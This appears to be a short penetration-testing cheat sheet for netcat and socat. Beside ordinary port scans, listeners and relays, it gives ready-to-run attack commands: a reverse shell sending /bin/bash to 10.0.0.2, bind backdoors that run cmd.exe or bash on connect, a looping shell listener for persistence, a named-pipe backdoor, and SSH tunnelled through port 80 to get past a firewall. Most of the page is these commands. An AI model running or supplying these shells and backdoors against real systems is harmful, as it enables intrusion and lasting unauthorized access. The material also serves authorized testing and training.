Netcat & Socat
Netcat rocks my socks
Connect to a socket on host
192.168.1.1 on TCP port 81nc 192.168.1.1 81
Listen on the local machine for inbound TCP connections on port 81
nc -nvlp 81
Reverse shell sent to host
10.0.0.2 over TCP port 53nc 10.0.0.2 53 -e /bin/bash
Backdoor listening on TCP 80 set to execute cmd.exe when connected
nc -nvlp 80 -e cmd.exe
Attempt to connect to each port from 10-90 on
10.0.0.1, don't resolve any names -n, don't send any data -z, and only wait 1 second for a connection -w1nc -nvzw1 10.0.0.1 10-90
Netcat stops listening after the connection drops or is terminated, which can make getting another shell back annoying. Placing
nc in a bash true loop is an easy way to work around this, use nohup also!while [ 1 ]; do echo “started”; nc -l -p 1234 -e /bin/sh; done
Netcat relay used to forward everything received by the host on TCP 4321 sent to
10.0.0.1 on TCP 8123nc -l -p 4321 | nc 10.0.0.1 8123
Create a
netcat backdoor without -e support. This generates a named pipe which is used to funnel data between bash and nc. mknod backpipe p
/bin/bash 0<backpipe | nc -l -p 8080 1>backpipe
If a specific port is blocked at the firewall, netcat can be used to pipe through authorized ports. Using the named pipe we can pipe the data thru to the nc output
mknod mypipe p
nc -lp 80 < mypipe | nc 127.0.0.1 22 > mypipe
ssh [email protected] -p 80 # Attcker command to connect to ssh piped thru port 80
socat is a program which can be used for enhanced netcat usage. Supports SSL and forking
# Below command listens locally on 8080, forwards connections to 10.0.0.1:80
socat -v tcp4-listen:8080,reuseaddr,fork TCP4:10.0.0.1:80
# Listen with SSL and send to std out
socat openssl-listen:8443,reuseaddr,cert=ssl.pem,verify=0,fork stdio
Last modified 6mo ago